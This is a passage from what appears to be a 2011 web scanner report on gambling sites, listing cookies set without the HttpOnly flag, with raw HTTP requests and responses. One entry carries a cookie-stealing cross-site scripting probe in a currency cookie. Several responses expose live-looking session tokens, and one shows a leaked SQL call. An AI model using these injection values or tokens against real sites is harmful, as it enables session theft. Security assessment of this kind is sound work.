Cache-Control: private
Content-Length: 18951
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARSRCDC=BELFFMIAILCNBCJKGGKCBCHH; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.29. http://mad4milk.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mad4milk.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:27 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220dab13bb74e8811bc287a4f680ca7c35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1305547348%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Mon, 16-May-2011 14:02:28 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...

12.30. https://members.bet365.com/members/chat/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://members.bet365.com
Path:   /members/chat/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:34:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
p3p: CP="CAO PSA OUR"
p3p: CP="CAO PSA OUR"
Set-Cookie: session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   bet365
</
...[SNIP]...

12.31. http://nl.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nl.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nl.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18732
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCQRQBAB=KMJLBMIAIMKCGBFFEACGNOMP; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.32. http://nl.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nl.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=9jhkgdc329m3l6ckield5tnpl7; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123202; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540579; expires=Tue, 15-May-2012 12:24:16 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:18 GMT
Connection: close
Content-Length: 23134

<!DOCTYPE html>
<html dir="ltr" lang="nl-NL">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - De #1 bestemming voor PRET met online Winnings amusement!..| Winnings.com</title>
<link rel=
...[SNIP]...

12.33. http://no.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://no.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: no.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18690
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATTTBCD=BBMFHMIAJOLBHGOJKCNLIMLA; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.34. http://no.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://no.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=tg684evsvkmguaeu71dlpar7c5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123206; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540583; expires=Tue, 15-May-2012 12:24:21 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:22 GMT
Connection: close
Content-Length: 23083

<!DOCTYPE html>
<html dir="ltr" lang="no">
<head>
<meta charset="UTF-8" />

<title>Winnings.com ... Det Beste Stedet for G..YAL Online Spilleunderholdning!..| Winnings.com</title>
<link rel="alt
...[SNIP]...

12.35. http://poker.bet365.com/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://poker.bet365.com
Path:   /en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mq2ig2f2luddpk55rdwctimv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
Set-Cookie: session=stk=81AD5D02297642A69F86A8FBF75699E8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.36. http://poker.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://poker.bet365.com
Path:   /home/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nyfxkkm5jpltjay123ux5555; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

12.37. http://primescratchcards.com/images/bg.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:54 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=LOLOLGNDDJEFHNPIDEEICOGL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.38. http://pt.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pt.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pt.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16556
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTQTACD=JFEHELIACOMFGKEBOEFKNGBF; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.39. http://pt.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pt.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=mi99ov4036kkfgf2v89k0a5qg6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123196; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540573; expires=Tue, 15-May-2012 12:23:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:23:58 GMT
Connection: close
Content-Length: 23185

<!DOCTYPE html>
<html dir="ltr" lang="pt-PT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O Destino #1 para Entretenimento e Ganhos Online!..| Winnings.com</title>
<link rel="alternat
...[SNIP]...

12.40. http://scratch.co.uk/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://scratch.co.uk
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fb5bnqutl39oc1fca1u5kqa4g1; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 11:41:31 GMT; path=/
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.41. http://scratch.co.uk/promotions/argos/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://scratch.co.uk
Path:   /promotions/argos/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7v2hmcv0dfh7oco4cn13kfcei7; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:29 GMT; path=/
Content-Type: text/html
Content-Length: 11256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.42. http://solutions.liveperson.com/ref/lppb.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQACDBBC=JOFLNHKAJGJGGOBMPFBILGBN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

12.43. http://sv.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sv.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sv.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18194
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQRSCCC=CGHBDOIAJFDFFAOAIIFEHOHP; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.44. http://sv.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sv.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=nr3a3rsougqdtponk6jao9tic6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123554; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540929; expires=Tue, 15-May-2012 12:33:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:33:44 GMT
Connection: close
Content-Length: 23007

<!DOCTYPE html>
<html dir="ltr" lang="sv-SE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Plats #1 f..r ROLIG Vinstrik Onlineunderh..llning!..| Winnings.com</title>
<link rel="alterna
...[SNIP]...

12.45. http://trk.primescratchcards.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ac=50&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:44:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 134
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 50 ,130137 ,5143, 201105160000

</html>

12.46. http://winnings.com/xmlrpc.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://winnings.com
Path:   /xmlrpc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xmlrpc.php?rsd HTTP/1.1
Host: winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=u48rghd23sabmvesels5bnlft5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123609; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540983; expires=Tue, 15-May-2012 12:37:59 GMT; path=/; domain=.winnings.com
Date: Mon, 16 May 2011 12:37:59 GMT
Connection: close
Content-Length: 810

<?xml version="1.0" encoding="UTF-8"?><rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
<service>
<engineName>WordPress</engineName>
<engineLink>http://wordpress.org/</engine
...[SNIP]...

12.47. http://www.bet365.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Mon, 16 May 2011 11:40:46 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Location: http://www.bet365.com/en/
Content-Length: 146
Content-Type: text/html
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Set-Cookie: session=stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/
Set-Cookie: stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.bet365.com/en/">here</a>.</body>

12.48. http://www.bet365.com/bg/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /bg/

Issue detail

